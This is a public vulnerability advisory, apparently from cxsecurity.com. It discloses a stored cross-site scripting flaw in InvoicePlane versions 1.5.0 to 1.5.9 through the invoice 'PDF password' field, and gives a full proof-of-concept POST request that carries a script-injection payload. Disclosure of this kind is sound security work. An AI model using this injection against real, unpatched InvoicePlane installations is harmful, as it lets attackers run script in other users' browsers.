InvoicePlane 1.5.0 "PDF password" parameter Stored XSS (v1.5.0 to 1.5.9)

2019.02.18
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 3.5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

POC: A Stored Cross-site scripting (XSS) was discovered in InvoicePlane application versions from v1.5.0 to v1.5.9(https://github.com/InvoicePlane/InvoicePlane) After logging into the InvoicePlane application, browse to "view invoices" option available at https://demo.invoiceplane.com/index.php/invoices/status/all and select any ivoice for Demonstartion, https://demo.invoiceplane.com/index.php/invoices/view/27. In this invoice page inject a JavaScript payload in "PDF password" parameter input. Injected JS payload will be sent to server as POST parameter data in "invoice_password" POST field Below is the POST Request for the InvoicePlane Application to execute Stored XSS: (Invoice_password parameter is vulnerable to Stored XSS): POST /index.php/invoices/ajax/save HTTP/1.1 Host: demo.invoiceplane.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://demo.invoiceplane.com/index.php/invoices/view/32 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 786 Cookie: ip_csrf_cookie=e6daab2293247ef975dc1e2bf621716e; ip_session=ki8khmtnpv7t3jkcj0q6dvsjm46oa6va Connection: close invoice_id=32& invoice_number=INV-19-0032& invoice_date_created=01%2F30%2F2019& invoice_date_due=03%2F01%2F2019& invoice_status_id=1& invoice_password=tester"><script>alert("StoredXSS")</script>& items=%5B%7B%22invoice_id%22%3A%2232%22%2C%22item_id%22%3A%22%22%2C%22item_product_id%22%3A%22%22%2C%22item_task_id%22%3A%22%22%2C%22item_name%22%3A%22%22%2C%22item_quantity%22%3A%22%22%2C%22item_price%22%3A%22%22%2C%22item_discount_amount%22%3A%22%22%2C%22item_tax_rate_id%22%3A%220%22%2C%22item_description%22%3A%22%22%2C%22item_product_unit_id%22%3A%220%22%2C%22item_order%22%3A1%7D%5D& invoice_discount_amount=& invoice_discount_percent=& invoice_terms=& custom%5B0%5D%5Bname%5D=custom%5B3%5D& custom%5B0%5D%5Bvalue%5D=& payment_method=0& _ip_csrf=e6daab2293247ef975dc1e2bf621716e

References:

https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002
)
https://www.acunetix.com/websitesecurity/xss/


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top